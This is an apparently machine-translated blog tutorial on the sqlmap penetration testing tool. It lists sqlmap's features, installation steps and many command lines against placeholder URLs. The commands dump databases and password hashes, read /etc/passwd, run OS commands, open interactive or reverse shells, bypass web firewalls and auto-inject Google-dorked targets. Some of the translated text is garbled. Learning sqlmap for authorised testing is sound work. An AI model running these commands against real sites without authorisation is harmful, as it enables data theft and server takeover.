SQL injection articles - injection tool uses detailed sqlmap

Language 2020-01-25 13:08:00 views: null

About sqlmap

sqlmap is an open source penetration testing tool that automatically detect and exploit SQL injection vulnerabilities and take over the database server. It is equipped with a powerful engine is detected, the final penetration tester many features and extensive niche switch, acquired from the fingerprint database to the data from the database via the underlying file system band access and execute commands on the operating system.

sqlmap function

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Vertica, Mckoi and Presto database management systems.
  • Fully supports six SQL injection techniques: based on blind Boolean query, the query based on blind time, based on an incorrect query, based on the joint inquiry-based queries and outside the stack with tracking.
  • Support direct connection to the database by providing DBMS credentials, IP address, port, and database name, without having to pass through SQL injection.
  • Support enumerate users, password hashes, privileges, roles, databases, tables and columns
  • Automatic identification and password hash format to break them using dictionary-based attacks.
  • Support dump database tables complete that, according to the user's selection, a series of entries or a particular column. The user can also select a range of characters only dump entries in each column.
  • Support search for a specific database name, across all databases of a particular table or across a specific column of all database tables . For example, it is useful for the identification credential comprises a custom application table, and the name of the relevant column contains the string, such as name and PASS.
  • Supports download and upload any files when the database software is MySQL, PostgreSQL or MicrosoftSQLServer, from the database server underlying file system.
  • Support to execute arbitrary commands and retrieve its standard output when the database software is MySQL, PostgreSQL or MicrosoftSQLServer, database server on the underlying operating system.
  • ** support is established between the attacker's computer and the database server has state-of-band tcp connection. ** the underlying operating system. The channel may be interactive command prompt, Meterpreter session or (VNC) session according to user selection of a graphical user interface.
  • Support database user privilege escalation process by Metasploit's Meterpreter getsystemcommand.

sqlmap installation

Download the installation package: https://pypi.org/project/sqlmap/#files

1. The installed package can be expanded to the C root directory

Here Insert Picture Description

2. Then enter the folder path

Here Insert Picture Description

3. Copy the path to the system environment variables

Here Insert Picture Description

4. Start cmd terminal, this input tool sqlmap.py

Here Insert Picture Description

Use sqlmap

Access to basic content

sqlmap -u "http://url/news?id=1" --current-user # Get the current user name

sqlmap -u "http://www.xxoo.com/news?id=1" --current-db # Get the current database name

sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" # Get a list of names

sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 # Gets the field name

sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 # Gets the field content

Important information acquisition

sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms Specify the database type

sqlmap -u "http://url/news?id=1" --users # Column in the database user

sqlmap -u "http://url/news?id=1" --dbs # Column in the database

sqlmap -u "http://url/news?id=1" --passwords # Database user password

sqlmap -u "http://url/news?id=1" --passwords-U root -v 0 # List the specified user database password

sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 # List the specified field, lists 20

sqlmap -u "http://url/news?id=1" --dump-all -v 0 #列出所有数据库所有表sqlmap -u "http://url/news?id=1" --privileges # View Permissions

sqlmap -u "http://url/news?id=1" --privileges -U root #查看指定用户权限sqlmap -u "http://url/news?id=1" --is-dba -v 1 # Whether the database administrator

sqlmap -u "http://url/news?id=1" --roles # Enumerate database user roles

sqlmap -u "http://url/news?id=1" --udf-inject # Import user-defined functions (acquisition system privileges!)

sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 # Table lists all the current library

sqlmap -u "http://url/news?id=1" --union-cols #union 查询表记录sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie injection

sqlmap -u "http://url/news?id=1" -b #获取banner信息sqlmap -u "http://url/news?id=1" --data "id=3" #post injection

sqlmap -u "http://url/news?id=1" -v 1 -f # Fingerprint identification database type

sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118" # Proxy injection

sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE" # Specify the keyword

sqlmap -u "http://url/news?id=1" --sql-shell #执行指定sql命令sqlmap -u "http://url/news?id=1" --file /etc/passwd

sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令sqlmap -u "http://url/news?id=1" --os-shell # Interactive shell system

sqlmap -u "http://url/news?id=1" --os-pwn # Rebound shell

sqlmap -u "http://url/news?id=1" --reg-read #读取win系统注册表sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log" # Save progress

sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume # Restore saved progress

Advanced Usage

-p name a number of parameters such as index.php? n_id = 1 & name = 2 & data = 2020 we want to specify a name parameter injection

sqlmap -g "google grammar" --dump-all --batch #google injection point automatically search all fields ran out of the need to ensure normal visit google.com

-technique test specified injection type \ use of technology

No arguments default to test all injection techniques

• B: Boolean-based blind SQL injection

• E: based on explicit wrong sql injection

• U: Based UNION injection

• S: laminate sql injection

• T: time-based blind

-tamper by bypassing the encoding WEB firewall (WAF) Sqlmap default with char ()

sqlmap -u "http://url/news?id=1" --smart --level 3 --users # Smart intelligent level perform test level

Attack Example:

Sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password

Magical A̶n̶n̶s̶ special symbols
Published 30 original articles · won 177 Like · views 20000 +
Private letter concerns

Guess you like

Origin blog.csdn.net/weixin_45728976/article/details/104081399
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com